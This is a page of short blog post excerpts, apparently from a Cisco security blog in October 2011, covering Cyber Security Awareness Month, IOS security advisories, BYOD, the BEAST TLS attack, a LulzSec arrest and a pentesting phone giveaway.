While the thoughts of many of us may turn to (American) football, Halloween, and raking leaves (at least those of us on the East Coast of the U.S.), the turning of the calendar page to October also means something else to all of us in the cyber security world. October, 2011 marks the eighth annual National Cyber Security Awareness Month sponsored by the Department of Homeland Security, in cooperation with the National Cyber Security Alliance (NCSA) and the Multi-State Information Sharing and Analysis Center (MS-ISAC). Read More »
Once again it’s time for Cisco’s semi-annual Cisco IOS Software Security Advisory Bundled Publication. Today’s edition of the bundle contains a total of nine IOS-related advisories and one non-IOS advisory for the Cisco Unified Communications Manager (CUCM) family of products. Included in the 10 Security Advisories are a total of 19 Cisco Bug IDs, each one representing an individual vulnerability.
Today, IT departments are receiving an increasing number of requests to support more mobile devices from a broader range of manufacturers than ever before. In fact, yesterday’s New York Times took a good look at companies that embrace BYOD (bring your own device). The gist is that today’s employee wants to leverage these mobile devices to improve their productivity. Based on resources, corporate security concerns and data protection, traditionally this has been at odds with IT departments.
Juliano Rizzo and Thai Duong presented a new attack on Transport Layer Security (TLS) at the Ekoparty security conference in Buenos Aires, Argentina. This presentation has received a lot of media attention and also has caused a lot of confusion, especially since all the details were unknown. The researchers named their proof-of-concept tool “Browser Exploit Against SSL/TLS” (BEAST) and are suggesting that it can decrypt secure cookies in minutes. The protocol deficiency they are highlighting is a problem that is due to the way that block ciphers are used in SSL/TLS.
I was disheartened to read about the 22 September arrest of alleged LulzSec/Anonymous member Cody Kretsinger (known by the handle ‘recursion’) by the FBI as a suspect in the SQL injection attacks on multiple Sony websites. Note that I was not sad to see the good guys bust a cybercriminal, but I was sad to see a nice guy I had met and talked to briefly at BlackHat Las Vegas 2011 turn out to be a suspect wanted by the FBI.
One of the things we at Cisco try to do is reach out to those studying infosec and wanting to make a career in security. At BlackHat Cisco had a contest where the winner got a Pwnie Express PWN Phone, effectively a modified Nokia N900 with some pentesting software loaded. A group of guys, volunteers with the show from an IT school, were fascinated by the PWN Phone – possibly because in their circle a couple of them had Nokia N900s, a device relatively unknown in North America but somewhat popular in certain hacking circles due to the fact that its OS is Linux-based and thus can be made to run things like metasploit (like the PWN Phone does).